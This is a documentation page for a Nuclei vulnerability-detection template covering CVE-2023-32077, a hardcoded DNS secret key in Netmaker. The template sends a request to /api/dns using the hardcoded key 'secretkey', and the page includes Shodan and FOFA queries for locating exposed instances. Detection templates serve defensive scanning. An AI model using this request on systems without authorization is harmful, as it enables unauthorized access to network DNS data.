Netmaker - Hardcoded DNS Secret Key
ID: CVE-2023-32077
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2023,info-key,netmaker,exposure,gravitl
Description
Section titled “Description”Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
YAML Source
Section titled “YAML Source”id: CVE-2023-32077
info: name: Netmaker - Hardcoded DNS Secret Key author: iamnoooob,rootxharsh,pdresearch severity: high description: | Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-32077 cwe-id: CWE-798,CWE-321 epss-score: 0.08146 epss-percentile: 0.94315 cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: gravitl product: netmaker shodan-query: - html:"netmaker" - http.html:"netmaker" fofa-query: body="netmaker" tags: cve,cve2023,info-key,netmaker,exposure,gravitl
http: - method: GET path: - "{{BaseURL}}/api/dns"
headers: Authorization: "x secretkey"
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "application/json")' - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")' condition: and# digest: 4a0a00473045022100e81b5cfc6308226c52af2469278a766ac75a42b0b8788c7997ba26e62f82b26e02204878546b9b7611dba755ce638619629915c33ac6cdf044de7d330de5d4a0e89b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-32077.yaml"